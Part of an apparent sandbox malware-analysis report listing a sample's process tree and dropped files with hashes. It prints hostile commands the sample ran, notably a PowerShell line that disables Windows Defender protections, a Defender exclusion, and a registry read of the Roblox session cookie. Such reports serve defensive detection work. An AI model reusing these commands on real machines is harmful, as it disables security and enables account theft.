                                                                                                                                                                                                                                                                                                                                                                                                                                          • Drops file in Drivers directory
                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:5052
                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                            "wmic.exe" csproduct get uuid
                                                                                                                                                                                                                                                                                                                                                                                                                                            61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:3832
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SYSTEM32\attrib.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Maple.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                              61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Views/modifies file attributes
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:4616
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Maple.exe'
                                                                                                                                                                                                                                                                                                                                                                                                                                              61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:436
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                                                                                                                                                                                                                                                                                                61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:428
                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                                                                                                                                                                                                                                61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:4276
                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\loader.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\loader.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                              60⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:3632
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Ondrive.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Ondrive.exe
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:3844
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Ondrive.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Ondrive.exe
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:2708
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Ondrive.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Ondrive.exe
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:4464

                                                                                                                                                                                                                                                                                                                            Network

                                                                                                                                                                                                                                                                                                                            MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                                                                                                                            Replay Monitor

                                                                                                                                                                                                                                                                                                                            Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                                            Downloads

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\server.exe.log

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              319B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              91046f2e147049d3e53cd9bf9d4d95ed

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              228e347d062840b2edcbd16904475aacad414c62

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              ea92f8291b86440b98162409b1f9f04470455c22be01a1480ea5ebc37eb168dc

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              071a9c6e17760a726c3a4519cf8006f36f17f50946af0129e0e1f3e480f6b7fcc804a7614b044247f2420a8b2b46bec5b8493e4869bb918bc7c0f6aa1346c3e0

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Maple.exe.log

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              4c8fa14eeeeda6fe76a08d14e08bf756

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              30003b6798090ec74eb477bbed88e086f8552976

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              7ebfcfca64b0c1c9f0949652d50a64452b35cefe881af110405cd6ec45f857a5

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              116f80182c25cf0e6159cf59a35ee27d66e431696d29ec879c44521a74ab7523cbfdefeacfb6a3298b48788d7a6caa5336628ec9c1d8b9c9723338dcffea4116

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Server.exe.log

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              654B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              2ff39f6c7249774be85fd60a8f9a245e

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              684ff36b31aedc1e587c8496c02722c6698c1c4e

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              2KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              d85ba6ff808d9e5444a4b369f5bc2730

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              31aa9d96590fff6981b315e0b391b575e4c0804a

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              948B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              5f90dcba500bfa625d5ece584fb2fee7

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              93a7a269d0492941aa33202fce89c49833e8e751

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              5636b964b3d7e0e89f2b9156d12264d90cbad9a0fd6a9c9ceecdc08cd25537ce

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              387464683e94472ed0cd8f44e40c973d6e638e114697eb25042a810d337aa945ed79d4a1db27eb41823adc207b5ef00a1124218e3668f26cec8d8a89a0280f23

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              276798eeb29a49dc6e199768bc9c2e71

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              548dd08570d121a65e82abb7171cae1c

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              1a1b5084b3a78f3acd0d811cc79dbcac121217ab

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              3b8d3c4c892bff751e1803cf1605437c

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              1b38fb9012a3811decb20dab10fe0b630ed32e47

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              f83e6f3bae55b2925b707e3208380ceaa227be96db5eaad386b53d5a2d9033ae

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              288132c2101a5415df975f289cb4c962948fda71f1ced4c40f0646a0f491bc10f1586516ac97cb610d78a006e65c3c857d8c6e83df26ccc8cfc2be5033f096ba

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              944B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              852f019aa3823e1c90335ba698f31412

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              a94ebb8e47316a5fec092ab897ec34299a82d200

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              b4bed2ce3d5b6577836eb2b0a766c008243a1db942e341717fb4bc18e84fc2f0

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              ca94865644cb570f60cf35a08ad5de6a3af4503bc40845237219c31e910f89cc93b280d997514583d86e6cf45eb2b8749bfe2e41bbaef67471e0b64b579e5ab3

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              944B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              a7cc007980e419d553568a106210549a

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              c03099706b75071f36c3962fcc60a22f197711e0

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              a5735921fc72189c8bf577f3911486cf031708dc8d6bc764fe3e593c0a053165

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              b9aaf29403c467daef80a1ae87478afc33b78f4e1ca16189557011bb83cf9b3e29a0f85c69fa209c45201fb28baca47d31756eee07b79c6312c506e8370f7666

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              944B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              67e8893616f805af2411e2f4a1411b2a

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              39bf1e1a0ddf46ce7c136972120f512d92827dcd

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              ca0dfe104c1bf27f7e01999fcdabc16c6400c3da937c832c26bdbca322381d31

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              164e911a9935e75c8be1a6ec3d31199a16ba2a1064da6c09d771b2a38dd7fddd142301ef55d67d90f306d3a454a1ce7b72e129ea42e44500b9b8c623a8d98b4d

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              944B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              21566061d72222c0f61944964f88d728

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              4b607ed74bdfc9bdd4b9f785da953250e2abc709

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              c5771389783a1f7e53a095f6dc28640f20be3662efebfd302f0dfd14e29ab4b5

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              a88f87bbf5f432b3511199eb6aba3981d3dddb568a81354bca8b755d128aa26c73964f1bf99879fde96c57d92797a53946426cce2799cad9cd8f96ba3cb4ca67

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              944B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              d8cb3e9459807e35f02130fad3f9860d

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              5af7f32cb8a30e850892b15e9164030a041f4bd6

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              2b139c74072ccbdaa17b950f32a6dbc934dfb7af9973d97c9b0d9c498012ba68

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              045239ba31367fbdd59e883f74eafc05724e23bd6e8f0c1e7171ea2496a497eb9e0cfcb57285bb81c4d569daadba43d6ef64c626ca48f1e2a59e8d97f0cc9184

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              948B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              7108354ce82e2196b23fe41d5d9faabf

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              46e63c8b0a945ee6f352b21673a7f604d6698ef4

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              d0fe5802fbce2de259afa86c19e927e5d8bada1c249bc7196af11008acf6904e

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              76493afe0d36919856acb551585a4474b9fb60bc418659a52214503bd1d7c62dbadfc25b9ef2b6ac0abfd3988b7ef2b86df4cc0c4129d3a868ec8e4576cbba6c

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              44cc2ace0ab8f6d2b9451e69ca703395

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              197e9c479a75b47a0be7f62d531c530bda7eeced

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              511469e6c6fef21d43955983c65007dc53f4c90b76fd1729b7da04b9d25756ba

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              60f5e6659e02e6fab9a1ab1bce47a19cf19eec1edf8a874d4712bc655e5a2c2e16bfff35ef701d75f1f137cf7063ba1c5685db6dc73355ee0fec16f7aba65f9c

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              64B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              857d6e353597ad6cd4b83c7fda77b0d7

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              e98696ad50de2ebf0ae417a8e7787b65c60674bc

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              66a9197be5efd8900bb55cabd3bfafc9348629712e894e78b09b0708f1a0c04d

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              dc2e36d68123ab8ac44a31b73a2fb34fc79700f788a6480c6c529e23f2f8e5c9e9a229be243cb6356d5d63c4b69f66b5dd456f09f887df2ed628723b4e971aa9

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              944B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              96ff1ee586a153b4e7ce8661cabc0442

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              140d4ff1840cb40601489f3826954386af612136

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              948B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              af283a45e468abc28a9ac1c14af0a45d

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              6d70a604e1a12e0df9b98a4bf57d335d78986c93

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              141a5cbf854b091471384f71c93282c31d166a8676d43559c38086dd6e07229c

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              05abb1f812dd979755e811928006974bccf076e8f618061e64db35b129bb78175a99bac6eefa5e11f6f3c4af94f60e9b7da4c4ba07fa740748ff47a4511d4db8

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              227556da5e65f6819f477756808c17e4

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              6ffce766e881ca2a60180bb25f4981b183f78279

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              101f5fe8a4192f14e9f0a12c105ca81c9f176860930af44747185dd1bedb59a4

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              d46b935809d2c4b7a041ad790f2db11c0a808df022c91ae9152b8769021b884fde49653a7a46557ef9ee65e274fe0b6c8503df9b50e6b3b849fefacf51f8bd6a

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              1KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              6317adf4fbc43ea2fd68861fafd57155

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              6b87c718893c83c6eed2767e8d9cbc6443e31913

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              c1ead17eef37b4b461cedc276504a441489e819c7f943037f2001966aeec90af

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              17229aae8622e4bfc3caaac55684f7d4ccd3162af5919c851b1d8ac4060b6bb7b75044ecee116523d05acb55197dcb60780958f629450edef386f1e6f65f49f0

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              944B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              77d622bb1a5b250869a3238b9bc1402b

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              d47f4003c2554b9dfc4c16f22460b331886b191b

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\4J0XdRqoCw5zPEQ

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              20KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              8a024482d288a5feed0afcc68ae6f204

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              3bf813e35544aa2e43c50263b14d893f5670854b

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              650c046b0f9fcd5ab8578c380a38ed71d2cc500f0a0a0f4cd527ecfd1759e4cc

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              23d9f00170d0014efd5198abf8dd765afb5df256ff295247cb79bb5fdbb851306183fdd5955e6f738cb62be25ca756c95a93bafd51c0a30b3a722bd792946c58

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\GPf9cWjM2NvCiM7

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              48KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              349e6eb110e34a08924d92f6b334801d

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              bdfb289daff51890cc71697b6322aa4b35ec9169

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Maple.exe

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              227KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              550b445ad1a44d1f23f7155fae400db6

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              cb006a53156285fdef3a0b33a4a08f534cd3bab7

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              d223b3918e8bc3bab1d23fdc2e306be1c6587d3ab8f324fc377e37585387884e

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              909f31f24672ffc5542ac42f344eb6020bcdfdfac9ac13d5672fe7ed22e686b06385d15709f1f83b576b1dade591ad40eb429ef076d07f4597235cd95a679fa5

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Q0BxqQ0qAqsUPYc

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              a182561a527f929489bf4b8f74f65cd7

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              8cd6866594759711ea1836e86a5b7ca64ee8911f

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Server.exe

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              71KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              f9b08bd21b40a938122b479095b7c70c

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              eb925e3927b83c20d8d24bdab2e587c10d6ac8cd

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              c96cde2e96021c266a202286d644ceb28543d6347e21006d72b29b8a72c505e8

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              fcc5784936b7f85a550883c472b99b5edfa7e5c6fd3872fd806b81c2ce1f195ca34342b230a89456066885579fe55aea46d91074ac08af192fbd04ea158473ee

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_irdiq0ne.iaz.ps1

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              60B

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                                                                                                                                                              SHA256

                                                                                                                                                                                                                                                                                                                              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                                                                                                                                                              SHA512

                                                                                                                                                                                                                                                                                                                              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\d6qZqVtO0HigigJ

                                                                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                                                                              20KB

                                                                                                                                                                                                                                                                                                                              MD5

                                                                                                                                                                                                                                                                                                                              49693267e0adbcd119f9f5e02adf3a80

                                                                                                                                                                                                                                                                                                                              SHA1

                                                                                                                                                                                                                                                                                                                              3ba3d7f89b8ad195ca82c92737e960e1f2b349df

